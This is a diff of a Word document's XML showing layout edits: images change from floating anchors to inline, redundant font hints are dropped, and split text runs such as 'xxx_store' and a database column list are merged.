       </w:pPr>
       <w:r>
         <w:rPr>
@@ -1649,17 +1478,9 @@
         </w:rPr>
         <w:lastRenderedPageBreak/>
         <w:drawing>
-          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251671552" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="34005273" wp14:editId="10C2D88E">
-            <wp:simplePos x="0" y="0"/>
-            <wp:positionH relativeFrom="margin">
-              <wp:align>center</wp:align>
-            </wp:positionH>
-            <wp:positionV relativeFrom="paragraph">
-              <wp:posOffset>48839</wp:posOffset>
-            </wp:positionV>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="48D97F50" wp14:editId="5AF5EAD7">
             <wp:extent cx="4153535" cy="3364865"/>
             <wp:effectExtent l="0" t="0" r="0" b="6985"/>
-            <wp:wrapTopAndBottom/>
             <wp:docPr id="7" name="图片 7"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
@@ -1672,7 +1493,13 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId10"/>
+                    <a:blip r:embed="rId10">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -1689,15 +1516,14 @@
                 </pic:pic>
               </a:graphicData>
             </a:graphic>
-            <wp14:sizeRelH relativeFrom="margin">
-              <wp14:pctWidth>0</wp14:pctWidth>
-            </wp14:sizeRelH>
-            <wp14:sizeRelV relativeFrom="margin">
-              <wp14:pctHeight>0</wp14:pctHeight>
-            </wp14:sizeRelV>
-          </wp:anchor>
+          </wp:inline>
         </w:drawing>
       </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="420"/>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -1725,9 +1551,6 @@
     <w:p>
       <w:pPr>
         <w:ind w:firstLine="420"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -1745,9 +1568,6 @@
     <w:p>
       <w:pPr>
         <w:ind w:firstLine="420"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:proofErr w:type="gramStart"/>
       <w:r>
@@ -1759,10 +1579,7 @@
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
-        <w:t>xx</w:t>
-      </w:r>
-      <w:r>
-        <w:t>x_store</w:t>
+        <w:t>xxx_store</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -1780,9 +1597,6 @@
     <w:p>
       <w:pPr>
         <w:ind w:firstLine="420"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -1794,9 +1608,6 @@
     <w:p>
       <w:pPr>
         <w:ind w:firstLine="420"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -1814,9 +1625,6 @@
     <w:p>
       <w:pPr>
         <w:ind w:firstLine="420"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -1834,9 +1642,6 @@
     <w:p>
       <w:pPr>
         <w:ind w:firstLine="420"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -1854,9 +1659,6 @@
     <w:p>
       <w:pPr>
         <w:ind w:firstLine="420"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -1867,9 +1669,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
+        <w:jc w:val="center"/>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -1877,17 +1677,9 @@
         </w:rPr>
         <w:lastRenderedPageBreak/>
         <w:drawing>
-          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251673600" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0D9F3D02" wp14:editId="30F439B0">
-            <wp:simplePos x="0" y="0"/>
-            <wp:positionH relativeFrom="margin">
-              <wp:align>center</wp:align>
-            </wp:positionH>
-            <wp:positionV relativeFrom="paragraph">
-              <wp:posOffset>0</wp:posOffset>
-            </wp:positionV>
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
             <wp:extent cx="3708000" cy="3276000"/>
             <wp:effectExtent l="0" t="0" r="6985" b="635"/>
-            <wp:wrapTopAndBottom/>
             <wp:docPr id="8" name="图片 8"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
@@ -1900,7 +1692,13 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId11"/>
+                    <a:blip r:embed="rId11">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -1917,22 +1715,13 @@
                 </pic:pic>
               </a:graphicData>
             </a:graphic>
-            <wp14:sizeRelH relativeFrom="margin">
-              <wp14:pctWidth>0</wp14:pctWidth>
-            </wp14:sizeRelH>
-            <wp14:sizeRelV relativeFrom="margin">
-              <wp14:pctHeight>0</wp14:pctHeight>
-            </wp14:sizeRelV>
-          </wp:anchor>
+          </wp:inline>
         </w:drawing>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:ind w:firstLine="420"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -1950,9 +1739,6 @@
     <w:p>
       <w:pPr>
         <w:ind w:firstLine="420"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:proofErr w:type="gramStart"/>
       <w:r>
@@ -1980,10 +1766,7 @@
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
-        <w:t>ag_id,email,id,mobi</w:t>
-      </w:r>
-      <w:r>
-        <w:t>le,name,password,status</w:t>
+        <w:t>ag_id,email,id,mobile,name,password,status</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -1993,9 +1776,6 @@
     <w:p>
       <w:pPr>
         <w:ind w:firstLine="420"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -2007,9 +1787,6 @@
     <w:p>
       <w:pPr>
         <w:ind w:firstLine="420"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -2027,9 +1804,6 @@
     <w:p>
       <w:pPr>
         <w:ind w:firstLine="420"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -2047,9 +1821,6 @@
     <w:p>
       <w:pPr>
         <w:ind w:firstLine="420"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -2061,9 +1832,6 @@
     <w:p>
       <w:pPr>
         <w:ind w:firstLine="420"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:proofErr w:type="gramStart"/>
       <w:r>
@@ -2104,9 +1872,6 @@
     <w:p>
       <w:pPr>
         <w:ind w:firstLine="420"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -2118,9 +1883,6 @@
     <w:p>
       <w:pPr>
         <w:ind w:firstLine="420"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -2138,9 +1900,6 @@
     <w:p>
       <w:pPr>
         <w:ind w:firstLine="420"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -2158,9 +1917,6 @@
     <w:p>
       <w:pPr>
         <w:ind w:firstLine="420"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -2250,9 +2006,6 @@
     <w:p>
       <w:pPr>
         <w:ind w:firstLine="420"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -2263,17 +2016,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:firstLine="420"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
+        <w:jc w:val="center"/>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -2281,17 +2024,9 @@
         </w:rPr>
         <w:lastRenderedPageBreak/>
         <w:drawing>
-          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251675648" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="06D24DFD" wp14:editId="12BF0DB4">
-            <wp:simplePos x="0" y="0"/>
-            <wp:positionH relativeFrom="margin">
-              <wp:align>center</wp:align>
-            </wp:positionH>
-            <wp:positionV relativeFrom="paragraph">
-              <wp:posOffset>304</wp:posOffset>
-            </wp:positionV>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="17FCE477" wp14:editId="5BD573A2">
             <wp:extent cx="3676015" cy="3975735"/>
             <wp:effectExtent l="0" t="0" r="635" b="5715"/>
-            <wp:wrapTopAndBottom/>
             <wp:docPr id="9" name="图片 9"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
@@ -2304,7 +2039,13 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId12"/>
+                    <a:blip r:embed="rId12">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -2321,15 +2062,17 @@
                 </pic:pic>
               </a:graphicData>
             </a:graphic>
-            <wp14:sizeRelH relativeFrom="margin">
-              <wp14:pctWidth>0</wp14:pctWidth>
-            </wp14:sizeRelH>
-            <wp14:sizeRelV relativeFrom="margin">
-              <wp14:pctHeight>0</wp14:pctHeight>
-            </wp14:sizeRelV>
-          </wp:anchor>
+          </wp:inline>
         </w:drawing>
       </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="420"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
+      <w:bookmarkEnd w:id="0"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -2399,9 +2142,6 @@
     <w:p>
       <w:pPr>
         <w:ind w:firstLine="420"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
     </w:p>
     <w:sectPr>
